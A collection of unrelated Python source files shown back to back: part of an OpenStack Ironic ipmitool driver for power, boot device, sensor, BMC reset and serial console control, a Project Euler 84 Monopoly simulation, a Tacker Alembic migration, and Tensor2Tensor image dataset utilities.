    out via notification bus and consumed by Ceilometer Collector.

    :param sensors_data: the sensor data returned by ipmitool command.
    :returns: the sensor data with JSON format, grouped by sensor type.
    :raises: FailedToParseSensorData when error encountered during parsing.

    """
    sensors_data_dict = {}
    if not sensors_data:
        return sensors_data_dict

    sensors_data_array = sensors_data.split('\n\n')
    for sensor_data in sensors_data_array:
        sensor_data_dict = _process_sensor(sensor_data)
        if not sensor_data_dict:
            continue

        sensor_type = _get_sensor_type(node, sensor_data_dict)

        # ignore the sensors which has no current 'Sensor Reading' data
        if 'Sensor Reading' in sensor_data_dict:
            sensors_data_dict.setdefault(
                sensor_type,
                {})[sensor_data_dict['Sensor ID']] = sensor_data_dict

    # get nothing, no valid sensor data
    if not sensors_data_dict:
        raise exception.FailedToParseSensorData(
            node=node.uuid,
            error=(_("parse ipmi sensor data failed, get nothing with input"
                     " data: %(sensors_data)s")
                   % {'sensors_data': sensors_data}))
    return sensors_data_dict


@task_manager.require_exclusive_lock
def send_raw(task, raw_bytes):
    """Send raw bytes to the BMC. Bytes should be a string of bytes.

    :param task: a TaskManager instance.
    :param raw_bytes: a string of raw bytes to send, e.g. '0x00 0x01'
    :raises: IPMIFailure on an error from ipmitool.
    :raises: MissingParameterValue if a required parameter is missing.
    :raises:  InvalidParameterValue when an invalid value is specified.

    """
    node_uuid = task.node.uuid
    LOG.debug('Sending node %(node)s raw bytes %(bytes)s',
              {'bytes': raw_bytes, 'node': node_uuid})
    driver_info = _parse_driver_info(task.node)
    cmd = 'raw %s' % raw_bytes

    try:
        out, err = _exec_ipmitool(driver_info, cmd)
        LOG.debug('send raw bytes returned stdout: %(stdout)s, stderr:'
                  ' %(stderr)s', {'stdout': out, 'stderr': err})
    except (exception.PasswordFileFailedToCreate,
            processutils.ProcessExecutionError) as e:
        LOG.exception(_LE('IPMI "raw bytes" failed for node %(node_id)s '
                      'with error: %(error)s.'),
                      {'node_id': node_uuid, 'error': e})
        raise exception.IPMIFailure(cmd=cmd)


def _check_temp_dir():
    """Check for Valid temp directory."""
    global TMP_DIR_CHECKED
    # because a temporary file is used to pass the password to ipmitool,
    # we should check the directory
    if TMP_DIR_CHECKED is None:
        try:
            utils.check_dir()
        except (exception.PathNotFound,
                exception.DirectoryNotWritable,
                exception.InsufficientDiskSpace) as e:
            with excutils.save_and_reraise_exception():
                TMP_DIR_CHECKED = False
                err_msg = (_("Ipmitool drivers need to be able to create "
                             "temporary files to pass password to ipmitool. "
                             "Encountered error: %s") % e)
                e.message = err_msg
                LOG.error(err_msg)
        else:
            TMP_DIR_CHECKED = True


class IPMIPower(base.PowerInterface):

    def __init__(self):
        try:
            _check_option_support(['timing', 'single_bridge', 'dual_bridge'])
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    def get_properties(self):
        return COMMON_PROPERTIES

    def validate(self, task):
        """Validate driver_info for ipmitool driver.

        Check that node['driver_info'] contains IPMI credentials.

        :param task: a TaskManager instance containing the node to act on.
        :raises: InvalidParameterValue if required ipmi parameters are missing.
        :raises: MissingParameterValue if a required parameter is missing.

        """
        _parse_driver_info(task.node)
        # NOTE(deva): don't actually touch the BMC in validate because it is
        #             called too often, and BMCs are too fragile.
        #             This is a temporary measure to mitigate problems while
        #             1314954 and 1314961 are resolved.

    def get_power_state(self, task):
        """Get the current power state of the task's node.

        :param task: a TaskManager instance containing the node to act on.
        :returns: one of ironic.common.states POWER_OFF, POWER_ON or ERROR.
        :raises: InvalidParameterValue if required ipmi parameters are missing.
        :raises: MissingParameterValue if a required parameter is missing.
        :raises: IPMIFailure on an error from ipmitool (from _power_status
            call).

        """
        driver_info = _parse_driver_info(task.node)
        return _power_status(driver_info)

    @task_manager.require_exclusive_lock
    def set_power_state(self, task, pstate):
        """Turn the power on or off.

        :param task: a TaskManager instance containing the node to act on.
        :param pstate: The desired power state, one of ironic.common.states
            POWER_ON, POWER_OFF.
        :raises: InvalidParameterValue if an invalid power state was specified.
        :raises: MissingParameterValue if required ipmi parameters are missing
        :raises: PowerStateFailure if the power couldn't be set to pstate.

        """
        driver_info = _parse_driver_info(task.node)

        if pstate == states.POWER_ON:
            state = _power_on(driver_info)
        elif pstate == states.POWER_OFF:
            state = _power_off(driver_info)
        else:
            raise exception.InvalidParameterValue(
                _("set_power_state called "
                  "with invalid power state %s.") % pstate)

        if state != pstate:
            raise exception.PowerStateFailure(pstate=pstate)

    @task_manager.require_exclusive_lock
    def reboot(self, task):
        """Cycles the power to the task's node.

        :param task: a TaskManager instance containing the node to act on.
        :raises: MissingParameterValue if required ipmi parameters are missing.
        :raises: InvalidParameterValue if an invalid power state was specified.
        :raises: PowerStateFailure if the final state of the node is not
            POWER_ON.

        """
        driver_info = _parse_driver_info(task.node)
        _power_off(driver_info)
        state = _power_on(driver_info)

        if state != states.POWER_ON:
            raise exception.PowerStateFailure(pstate=states.POWER_ON)


class IPMIManagement(base.ManagementInterface):

    def get_properties(self):
        return COMMON_PROPERTIES

    def __init__(self):
        try:
            _check_option_support(['timing', 'single_bridge', 'dual_bridge'])
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    def validate(self, task):
        """Check that 'driver_info' contains IPMI credentials.

        Validates whether the 'driver_info' property of the supplied
        task's node contains the required credentials information.

        :param task: a task from TaskManager.
        :raises: InvalidParameterValue if required IPMI parameters
            are missing.
        :raises: MissingParameterValue if a required parameter is missing.

        """
        _parse_driver_info(task.node)

    def get_supported_boot_devices(self, task):
        """Get a list of the supported boot devices.

        :param task: a task from TaskManager.
        :returns: A list with the supported boot devices defined
                  in :mod:`ironic.common.boot_devices`.

        """
        return [boot_devices.PXE, boot_devices.DISK, boot_devices.CDROM,
                boot_devices.BIOS, boot_devices.SAFE]

    @task_manager.require_exclusive_lock
    def set_boot_device(self, task, device, persistent=False):
        """Set the boot device for the task's node.

        Set the boot device to use on next reboot of the node.

        :param task: a task from TaskManager.
        :param device: the boot device, one of
                       :mod:`ironic.common.boot_devices`.
        :param persistent: Boolean value. True if the boot device will
                           persist to all future boots, False if not.
                           Default: False.
        :raises: InvalidParameterValue if an invalid boot device is specified
        :raises: MissingParameterValue if required ipmi parameters are missing.
        :raises: IPMIFailure on an error from ipmitool.

        """
        if device not in self.get_supported_boot_devices(task):
            raise exception.InvalidParameterValue(_(
                "Invalid boot device %s specified.") % device)

        # note(JayF): IPMI spec indicates unless you send these raw bytes the
        # boot device setting times out after 60s. Since it's possible it
        # could be >60s before a node is rebooted, we should always send them.
        # This mimics pyghmi's current behavior, and the "option=timeout"
        # setting on newer ipmitool binaries.
        timeout_disable = "0x00 0x08 0x03 0x08"
        send_raw(task, timeout_disable)

        cmd = "chassis bootdev %s" % device
        if persistent:
            cmd = cmd + " options=persistent"
        driver_info = _parse_driver_info(task.node)
        try:
            out, err = _exec_ipmitool(driver_info, cmd)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            LOG.warning(_LW('IPMI set boot device failed for node %(node)s '
                            'when executing "ipmitool %(cmd)s". '
                            'Error: %(error)s'),
                        {'node': driver_info['uuid'], 'cmd': cmd, 'error': e})
            raise exception.IPMIFailure(cmd=cmd)

    def get_boot_device(self, task):
        """Get the current boot device for the task's node.

        Returns the current boot device of the node.

        :param task: a task from TaskManager.
        :raises: InvalidParameterValue if required IPMI parameters
            are missing.
        :raises: IPMIFailure on an error from ipmitool.
        :raises: MissingParameterValue if a required parameter is missing.
        :returns: a dictionary containing:

            :boot_device: the boot device, one of
                :mod:`ironic.common.boot_devices` or None if it is unknown.
            :persistent: Whether the boot device will persist to all
                future boots or not, None if it is unknown.

        """
        cmd = "chassis bootparam get 5"
        driver_info = _parse_driver_info(task.node)
        response = {'boot_device': None, 'persistent': None}
        try:
            out, err = _exec_ipmitool(driver_info, cmd)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            LOG.warning(_LW('IPMI get boot device failed for node %(node)s '
                            'when executing "ipmitool %(cmd)s". '
                            'Error: %(error)s'),
                        {'node': driver_info['uuid'], 'cmd': cmd, 'error': e})
            raise exception.IPMIFailure(cmd=cmd)

        re_obj = re.search('Boot Device Selector : (.+)?\n', out)
        if re_obj:
            boot_selector = re_obj.groups('')[0]
            if 'PXE' in boot_selector:
                response['boot_device'] = boot_devices.PXE
            elif 'Hard-Drive' in boot_selector:
                if 'Safe-Mode' in boot_selector:
                    response['boot_device'] = boot_devices.SAFE
                else:
                    response['boot_device'] = boot_devices.DISK
            elif 'BIOS' in boot_selector:
                response['boot_device'] = boot_devices.BIOS
            elif 'CD/DVD' in boot_selector:
                response['boot_device'] = boot_devices.CDROM

        response['persistent'] = 'Options apply to all future boots' in out
        return response

    def get_sensors_data(self, task):
        """Get sensors data.

        :param task: a TaskManager instance.
        :raises: FailedToGetSensorData when getting the sensor data fails.
        :raises: FailedToParseSensorData when parsing sensor data fails.
        :raises: InvalidParameterValue if required ipmi parameters are missing
        :raises: MissingParameterValue if a required parameter is missing.
        :returns: returns a dict of sensor data group by sensor type.

        """
        driver_info = _parse_driver_info(task.node)
        # with '-v' option, we can get the entire sensor data including the
        # extended sensor informations
        cmd = "sdr -v"
        try:
            out, err = _exec_ipmitool(driver_info, cmd)
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            raise exception.FailedToGetSensorData(node=task.node.uuid,
                                                  error=e)

        return _parse_ipmi_sensors_data(task.node, out)


class VendorPassthru(base.VendorInterface):

    def __init__(self):
        try:
            _check_option_support(['single_bridge', 'dual_bridge'])
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    @base.passthru(['POST'])
    @task_manager.require_exclusive_lock
    def send_raw(self, task, http_method, raw_bytes):
        """Send raw bytes to the BMC. Bytes should be a string of bytes.

        :param task: a TaskManager instance.
        :param http_method: the HTTP method used on the request.
        :param raw_bytes: a string of raw bytes to send, e.g. '0x00 0x01'
        :raises: IPMIFailure on an error from ipmitool.
        :raises: MissingParameterValue if a required parameter is missing.
        :raises:  InvalidParameterValue when an invalid value is specified.

        """
        send_raw(task, raw_bytes)

    @base.passthru(['POST'])
    @task_manager.require_exclusive_lock
    def bmc_reset(self, task, http_method, warm=True):
        """Reset BMC with IPMI command 'bmc reset (warm|cold)'.

        :param task: a TaskManager instance.
        :param http_method: the HTTP method used on the request.
        :param warm: boolean parameter to decide on warm or cold reset.
        :raises: IPMIFailure on an error from ipmitool.
        :raises: MissingParameterValue if a required parameter is missing.
        :raises: InvalidParameterValue when an invalid value is specified

        """
        node_uuid = task.node.uuid

        if warm:
            warm_param = 'warm'
        else:
            warm_param = 'cold'

        LOG.debug('Doing %(warm)s BMC reset on node %(node)s',
                  {'warm': warm_param, 'node': node_uuid})
        driver_info = _parse_driver_info(task.node)
        cmd = 'bmc reset %s' % warm_param

        try:
            out, err = _exec_ipmitool(driver_info, cmd)
            LOG.debug('bmc reset returned stdout: %(stdout)s, stderr:'
                      ' %(stderr)s', {'stdout': out, 'stderr': err})
        except (exception.PasswordFileFailedToCreate,
                processutils.ProcessExecutionError) as e:
            LOG.exception(_LE('IPMI "bmc reset" failed for node %(node_id)s '
                          'with error: %(error)s.'),
                          {'node_id': node_uuid, 'error': e})
            raise exception.IPMIFailure(cmd=cmd)

    def get_properties(self):
        return COMMON_PROPERTIES

    def validate(self, task, method, **kwargs):
        """Validate vendor-specific actions.

        If invalid, raises an exception; otherwise returns None.

        Valid methods:
          * send_raw
          * bmc_reset

        :param task: a task from TaskManager.
        :param method: method to be validated
        :param kwargs: info for action.
        :raises: InvalidParameterValue when an invalid parameter value is
                 specified.
        :raises: MissingParameterValue if a required parameter is missing.

        """
        if method == 'send_raw':
            if not kwargs.get('raw_bytes'):
                raise exception.MissingParameterValue(_(
                    'Parameter raw_bytes (string of bytes) was not '
                    'specified.'))

        _parse_driver_info(task.node)


class IPMIShellinaboxConsole(base.ConsoleInterface):
    """A ConsoleInterface that uses ipmitool and shellinabox."""

    def __init__(self):
        try:
            _check_option_support(['timing', 'single_bridge', 'dual_bridge'])
        except OSError:
            raise exception.DriverLoadError(
                driver=self.__class__.__name__,
                reason=_("Unable to locate usable ipmitool command in "
                         "the system path when checking ipmitool version"))
        _check_temp_dir()

    def get_properties(self):
        d = COMMON_PROPERTIES.copy()
        d.update(CONSOLE_PROPERTIES)
        return d

    def validate(self, task):
        """Validate the Node console info.

        :param task: a task from TaskManager.
        :raises: InvalidParameterValue
        :raises: MissingParameterValue when a required parameter is missing

        """
        driver_info = _parse_driver_info(task.node)
        if not driver_info['port']:
            raise exception.MissingParameterValue(_(
                "Missing 'ipmi_terminal_port' parameter in node's"
                " driver_info."))

        if driver_info['protocol_version'] != '2.0':
            raise exception.InvalidParameterValue(_(
                "Serial over lan only works with IPMI protocol version 2.0. "
                "Check the 'ipmi_protocol_version' parameter in "
                "node's driver_info"))

    def start_console(self, task):
        """Start a remote console for the node.

        :param task: a task from TaskManager
        :raises: InvalidParameterValue if required ipmi parameters are missing
        :raises: PasswordFileFailedToCreate if unable to create a file
                 containing the password
        :raises: ConsoleError if the directory for the PID file cannot be
                 created
        :raises: ConsoleSubprocessFailed when invoking the subprocess failed
        """
        driver_info = _parse_driver_info(task.node)

        path = _console_pwfile_path(driver_info['uuid'])
        pw_file = console_utils.make_persistent_password_file(
            path, driver_info['password'])

        ipmi_cmd = ("/:%(uid)s:%(gid)s:HOME:ipmitool -H %(address)s"
                    " -I lanplus -U %(user)s -f %(pwfile)s"
                    % {'uid': os.getuid(),
                       'gid': os.getgid(),
                       'address': driver_info['address'],
                       'user': driver_info['username'],
                       'pwfile': pw_file})

        for name, option in BRIDGING_OPTIONS:
            if driver_info[name] is not None:
                ipmi_cmd = " ".join([ipmi_cmd,
                                     option, driver_info[name]])

        if CONF.debug:
            ipmi_cmd += " -v"
        ipmi_cmd += " sol activate"
        try:
            console_utils.start_shellinabox_console(driver_info['uuid'],
                                                    driver_info['port'],
                                                    ipmi_cmd)
        except (exception.ConsoleError, exception.ConsoleSubprocessFailed):
            with excutils.save_and_reraise_exception():
                utils.unlink_without_raise(path)

    def stop_console(self, task):
        """Stop the remote console session for the node.

        :param task: a task from TaskManager
        :raises: InvalidParameterValue if required ipmi parameters are missing
        :raises: ConsoleError if unable to stop the console
        """
        driver_info = _parse_driver_info(task.node)
        try:
            console_utils.stop_shellinabox_console(driver_info['uuid'])
        finally:
            utils.unlink_without_raise(
                _console_pwfile_path(driver_info['uuid']))

    def get_console(self, task):
        """Get the type and connection information about the console."""
        driver_info = _parse_driver_info(task.node)
        url = console_utils.get_shellinabox_console_url(driver_info['port'])
        return {'type': 'shellinabox', 'url': url}

#!/usr/bin/env python

from random import choice

from python.decorators import euler_timer

SQUARES = ["GO",
           "A1", "CC1", "A2", "T1", "R1", "B1", "CH1", "B2", "B3",
           "JAIL",
           "C1", "U1", "C2", "C3", "R2", "D1", "CC2", "D2", "D3",
           "FP",
           "E1", "CH2", "E2", "E3", "R3", "F1", "F2", "U2", "F3",
           "G2J",
           "G1", "G2", "CC3", "G3", "R4", "CH3", "H1", "T2", "H2"]


def roll_die(size):
    first_die = choice(range(1, size + 1))
    second_die = choice(range(1, size + 1))

    return (first_die + second_die, (first_die == second_die))


def back(square, step):
    index = SQUARES.index(square)
    new_index = (index - step) % len(SQUARES)
    return SQUARES[new_index]


def next_specific(square, next_type):
    if next_type not in ["R", "U"]:
        raise Exception("next_specific only intended for R and U")

    # R1=5, R2=15, R3=25, R4=35
    index = SQUARES.index(square)
    if next_type == "R":
        if 0 <= index < 5 or 35 < index:
            return "R1"
        elif 5 < index < 15:
            return "R2"
        elif 15 < index < 25:
            return "R3"
        elif 25 < index < 35:
            return "R4"
        else:
            raise Exception("Case should not occur")
    # U1=12, U2=28
    elif next_type == "U":
        if 0 <= index < 12 or index > 28:
            return "U1"
        elif 12 < index < 28:
            return "U2"
        else:
            return Exception("Case should not occur")
    else:
        raise Exception("Case should not occur")


def next_square(landing_square, chance_card, chest_card):
    if landing_square not in ["CC1", "CC2", "CC3", "CH1", "CH2", "CH3", "G2J"]:
        return (landing_square, chance_card, chest_card)

    if landing_square == "G2J":
        return ("JAIL", chance_card, chest_card)
    elif landing_square in ["CC1", "CC2", "CC3"]:
        # 1/16 Go, Jail
        # 14/16 Stay
        chest_card = (chest_card + 1) % 16
        if chest_card == 0:
            return ("GO", chance_card, chest_card)
        elif chest_card == 1:
            return ("JAIL", chance_card, chest_card)
        else:
            return (landing_square, chance_card, chest_card)
    elif landing_square in ["CH1", "CH2", "CH3"]:
        # 1/16 Go, Jail, C1, E3, H2, R1, next U, back 3
        # 1/8 Next R
        chance_card = (chance_card + 1) % 16
        if chance_card == 0:
            return ("GO", chance_card, chest_card)
        elif chance_card == 1:
            return ("JAIL", chance_card, chest_card)
        elif chance_card == 2:
            return ("C1", chance_card, chest_card)
        elif chance_card == 3:
            return ("E3", chance_card, chest_card)
        elif chance_card == 4:
            return ("H2", chance_card, chest_card)
        elif chance_card == 5:
            return ("R1", chance_card, chest_card)
        elif chance_card == 6:
            return (next_specific(landing_square, "U"),
                    chance_card, chest_card)
        elif chance_card == 7:
            return next_square(back(landing_square, 3),
                               chance_card, chest_card)
        elif chance_card in [8, 9]:
            return (next_specific(landing_square, "R"),
                    chance_card, chest_card)
        else:
            return (landing_square, chance_card, chest_card)
    else:
        raise Exception("Case should not occur")


def main(verbose=False):
    GAME_PLAY = 10 ** 6
    dice_size = 4
    visited = {"GO": 1}
    current = "GO"
    chance_card = 0
    chest_card = 0
    doubles = 0
    for place in xrange(GAME_PLAY):
        total, double = roll_die(dice_size)
        if double:
            doubles += 1
        else:
            doubles = 0

        if doubles == 3:
            doubles = 0
            current = "JAIL"
        else:
            index = SQUARES.index(current)
            landing_square = SQUARES[(index + total) % len(SQUARES)]
            (current, chance_card,
             chest_card) = next_square(landing_square, chance_card, chest_card)

        # if current is not in visited, sets to 1
        # (default 0 returned by get)
        visited[current] = visited.get(current, 0) + 1

    top_visited = sorted(visited.items(),
                         key=lambda pair: pair[1],
                         reverse=True)
    top_visited = [SQUARES.index(square[0]) for square in top_visited[:3]]

    return ''.join(str(index).zfill(2) for index in top_visited)

if __name__ == '__main__':
    print euler_timer(84)(main)(verbose=True)

# Copyright 2022 OpenStack Foundation
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
#

"""add tenant_id to lcm_subscriptions and lcm_op_occs

Revision ID: d6ae359ab0d6
Revises: 3ff50553e9d3
Create Date: 2022-01-06 13:35:53.868106

"""

from alembic import op
import sqlalchemy as sa

# revision identifiers, used by Alembic.
revision = 'd6ae359ab0d6'
down_revision = '3ff50553e9d3'


def upgrade(active_plugins=None, options=None):
    op.add_column('vnf_lcm_subscriptions',
                  sa.Column('tenant_id', sa.String(length=64),
                  nullable=False))

    op.add_column('vnf_lcm_op_occs',
                  sa.Column('tenant_id', sa.String(length=64),
                  nullable=False))

# coding=utf-8
# Copyright 2022 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Base classes and utilities for image datasets."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function


import io
import os
import numpy as np
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.layers import common_layers
from tensor2tensor.layers import modalities
from tensor2tensor.utils import contrib
from tensor2tensor.utils import metrics

import tensorflow.compat.v1 as tf


def matplotlib_pyplot():
  import matplotlib  # pylint: disable=g-import-not-at-top
  matplotlib.use("agg")
  import matplotlib.pyplot as plt  # pylint: disable=g-import-not-at-top
  return plt


def image_to_tf_summary_value(image, tag):
  """Converts a NumPy image to a tf.Summary.Value object.

  Args:
    image: 3-D NumPy array.
    tag: name for tf.Summary.Value for display in tensorboard.
  Returns:
    image_summary: A tf.Summary.Value object.
  """
  curr_image = np.asarray(image, dtype=np.uint8)
  height, width, n_channels = curr_image.shape
  # If monochrome image, then reshape to [height, width]
  if n_channels == 1:
    curr_image = np.reshape(curr_image, [height, width])
  s = io.BytesIO()
  matplotlib_pyplot().imsave(s, curr_image, format="png")
  img_sum = tf.Summary.Image(encoded_image_string=s.getvalue(),
                             height=height, width=width,
                             colorspace=n_channels)
  return tf.Summary.Value(tag=tag, image=img_sum)


def convert_predictions_to_image_summaries(hook_args):
  """Optionally converts images from hooks_args to image summaries.

  Args:
    hook_args: DecodeHookArgs namedtuple
  Returns:
    summaries: list of tf.Summary values if hook_args.decode_hpara
  """
  decode_hparams = hook_args.decode_hparams
  if not decode_hparams.display_decoded_images:
    return []
  predictions = hook_args.predictions[0]

  # Display ten random inputs and outputs so that tensorboard does not hang.
  all_summaries = []
  rand_predictions = np.random.choice(predictions, size=10)
  for ind, prediction in enumerate(rand_predictions):
    output_summary = image_to_tf_summary_value(
        prediction["outputs"], tag="%d_output" % ind)
    input_summary = image_to_tf_summary_value(
        prediction["inputs"], tag="%d_input" % ind)
    all_summaries.append(input_summary)
    all_summaries.append(output_summary)
  return all_summaries


def resize_by_area(img, size):
  """image resize function used by quite a few image problems."""
  return tf.to_int64(
      tf.image.resize_images(img, [size, size], tf.image.ResizeMethod.AREA))


def make_multiscale(image, resolutions,
                    resize_method=tf.image.ResizeMethod.BICUBIC,
                    num_channels=3):
  """Returns list of scaled images, one for each resolution.

  Args:
    image: Tensor of shape [height, height, num_channels].
    resolutions: List of heights that image's height is resized to.
    resize_method: tf.image.ResizeMethod.
    num_channels: Number of channels in image.

  Returns:
    List of Tensors, one for each resolution with shape given by
    [resolutions[i], resolutions[i], num_channels].
  """
  scaled_images = []
  for height in resolutions:
    scaled_image = tf.image.resize_images(
        image,
        size=[height, height],  # assuming that height = width
        method=resize_method)
    scaled_image = tf.to_int64(scaled_image)
    scaled_image.set_shape([height, height, num_channels])
    scaled_images.append(scaled_image)

  return scaled_images


def make_multiscale_dilated(image, resolutions, num_channels=3):
  """Returns list of scaled images, one for each resolution.

  Resizes by skipping every nth pixel.

  Args:
    image: Tensor of shape [height, height, num_channels].
    resolutions: List of heights that image's height is resized to. The function
      assumes VALID padding, so the original image's height must be divisible
      by each resolution's height to return the exact resolution size.
    num_channels: Number of channels in image.

  Returns:
    List of Tensors, one for each resolution with shape given by
    [resolutions[i], resolutions[i], num_channels] if resolutions properly
    divide the original image's height; otherwise shape height and width is up
    to valid skips.
  """
  image_height = common_layers.shape_list(image)[0]
  scaled_images = []
  for height in resolutions:
    dilation_rate = image_height // height  # assuming height = width
    scaled_image = image[::dilation_rate, ::dilation_rate]
    scaled_image = tf.to_int64(scaled_image)
    scaled_image.set_shape([None, None, num_channels])
    scaled_images.append(scaled_image)
  return scaled_images


class ImageProblem(problem.Problem):
  """Base class for problems with images."""

  @property
  def num_channels(self):
    """Number of color channels."""
    return 3

  @property
  def vocab_size(self):
    """Number of pixel values."""
    return 256

  def example_reading_spec(self):
    data_fields = {
        "image/encoded": tf.FixedLenFeature((), tf.string),
        "image/format": tf.FixedLenFeature((), tf.string),
    }

    data_items_to_decoders = {
        "inputs":
            contrib.slim().tfexample_decoder.Image(
                image_key="image/encoded",
                format_key="image/format",
                channels=self.num_channels),
    }

    return data_fields, data_items_to_decoders

  def preprocess_example(self, example, mode, hparams):
    if not self._was_reversed:
      example["inputs"] = tf.image.per_image_standardization(example["inputs"])
    return example

  def eval_metrics(self):
    eval_metrics = [
        metrics.Metrics.ACC, metrics.Metrics.ACC_TOP5,
        metrics.Metrics.ACC_PER_SEQ, metrics.Metrics.NEG_LOG_PERPLEXITY
    ]
    if self._was_reversed:
      eval_metrics += [metrics.Metrics.IMAGE_SUMMARY]
    return eval_metrics

  @property
  def decode_hooks(self):
    return [convert_predictions_to_image_summaries]


class Image2ClassProblem(ImageProblem):
  """Base class for image classification problems."""

  @property
  def is_small(self):
    raise NotImplementedError()

  @property
  def num_classes(self):
    raise NotImplementedError()

  @property
  def train_shards(self):
    raise NotImplementedError()

  @property
  def dev_shards(self):
    return 1

  @property
  def class_labels(self):
    return ["ID_%d" % i for i in range(self.num_classes)]

  def feature_encoders(self, data_dir):
    del data_dir
    return {
        "inputs": text_encoder.ImageEncoder(channels=self.num_channels),
        "targets": text_encoder.ClassLabelEncoder(self.class_labels)
    }

  def generator(self, data_dir, tmp_dir, is_training):
    raise NotImplementedError()

  def example_reading_spec(self):
    label_key = "image/class/label"
    data_fields, data_items_to_decoders = (
        super(Image2ClassProblem, self).example_reading_spec())
    data_fields[label_key] = tf.FixedLenFeature((1,), tf.int64)

    data_items_to_decoders["targets"] = contrib.slim().tfexample_decoder.Tensor(
        label_key)
    return data_fields, data_items_to_decoders

  def hparams(self, defaults, unused_model_hparams):
    p = defaults
    p.modality = {"inputs": modalities.ModalityType.IMAGE,
                  "targets": modalities.ModalityType.CLASS_LABEL}
    p.vocab_size = {"inputs": 256,
                    "targets": self.num_classes}
    p.batch_size_multiplier = 4 if self.is_small else 256
    p.loss_multiplier = 3.0 if self.is_small else 1.0
    if self._was_reversed:
      p.loss_multiplier = 1.0
    p.input_space_id = problem.SpaceID.IMAGE
    p.target_space_id = problem.SpaceID.IMAGE_LABEL

  def generate_data(self, data_dir, tmp_dir, task_id=-1):
    generator_utils.generate_dataset_and_shuffle(
        self.generator(data_dir, tmp_dir, True),
        self.training_filepaths(data_dir, self.train_shards, shuffled=False),
        self.generator(data_dir, tmp_dir, False),
        self.dev_filepaths(data_dir, self.dev_shards, shuffled=False))


def encode_images_as_png(images):
  """Yield images encoded as pngs."""
  if tf.executing_eagerly():
    for image in images:
      yield tf.image.encode_png(image).numpy()
  else:
    (height, width, channels) = images[0].shape
    with tf.Graph().as_default():
      image_t = tf.placeholder(dtype=tf.uint8, shape=(height, width, channels))
      encoded_image_t = tf.image.encode_png(image_t)
      with tf.Session() as sess:
        for image in images:
          enc_string = sess.run(encoded_image_t, feed_dict={image_t: image})
          yield enc_string


def image_generator(images, labels):
  """Generator for images that takes image and labels lists and creates pngs.

  Args:
    images: list of images given as [width x height x channels] numpy arrays.
    labels: list of ints, same length as images.

  Yields:
    A dictionary representing the images with the following fields:
    * image/encoded: the string encoding the image as PNG,
    * image/format: the string "png" representing image format,
    * image/class/label: an integer representing the label,
    * image/height: an integer representing the height,
    * image/width: an integer representing the width.
    Every field is actually a singleton list of the corresponding type.

  Raises:
    ValueError: if images is an empty list.
  """
  if not images:
    raise ValueError("Must provide some images for the generator.")
  width, height, _ = images[0].shape
  for (enc_image, label) in zip(encode_images_as_png(images), labels):
    yield {
        "image/encoded": [enc_image],
        "image/format": ["png"],
        "image/class/label": [int(label)],
        "image/height": [height],
        "image/width": [width]
    }


class Image2TextProblem(ImageProblem):
  """Base class for image-to-text problems."""

  @property
  def is_character_level(self):
    raise NotImplementedError()

  @property
  def vocab_problem(self):
    raise NotImplementedError()  # Not needed if self.is_character_level.

  @property
  def target_space_id(self):
    raise NotImplementedError()

  @property
  def train_shards(self):
    raise NotImplementedError()

  @property
  def dev_shards(self):
    raise NotImplementedError()

  def generator(self, data_dir, tmp_dir, is_training):
    raise NotImplementedError()

  def example_reading_spec(self):
    label_key = "image/class/label"
    data_fields, data_items_to_decoders = (
        super(Image2TextProblem, self).example_reading_spec())
    data_fields[label_key] = tf.VarLenFeature(tf.int64)
    data_items_to_decoders["targets"] = contrib.slim().tfexample_decoder.Tensor(
        label_key)
    return data_fields, data_items_to_decoders

  def feature_encoders(self, data_dir):
    if self.is_character_level:
      encoder = text_encoder.ByteTextEncoder()
    else:
      vocab_filename = os.path.join(
          data_dir, self.vocab_problem.vocab_filename)
      encoder = text_encoder.SubwordTextEncoder(vocab_filename)
    input_encoder = text_encoder.ImageEncoder(channels=self.num_channels)
    return {"inputs": input_encoder, "targets": encoder}

  def hparams(self, defaults, unused_model_hparams):
    p = defaults
    p.modality = {"inputs": modalities.ModalityType.IMAGE,
                  "targets": modalities.ModalityType.SYMBOL}
    p.vocab_size = {"inputs": 256,
                    "targets": self._encoders["targets"].vocab_size}
    p.batch_size_multiplier = 256
    p.loss_multiplier = 1.0
    p.input_space_id = problem.SpaceID.IMAGE
    p.target_space_id = self.target_space_id

  def generate_data(self, data_dir, tmp_dir, task_id=-1):
    generator_utils.generate_dataset_and_shuffle(
        self.generator(data_dir, tmp_dir, True),
        self.training_filepaths(data_dir, self.train_shards, shuffled=False),
        self.generator(data_dir, tmp_dir, False),
        self.dev_filepaths(data_dir, self.dev_shards, shuffled=False))


def image_augmentation(images, do_colors=False, crop_size=None):
  """Image augmentation: cropping, flipping, and color transforms."""
  if crop_size is None:
    crop_size = [299, 299]
  images = tf.random_crop(images, crop_size + [3])
  images = tf.image.random_flip_left_right(images)
  if do_colors:  # More augmentation, but might be slow.
    images = tf.image.random_brightness(images, max_delta=32. / 255.)
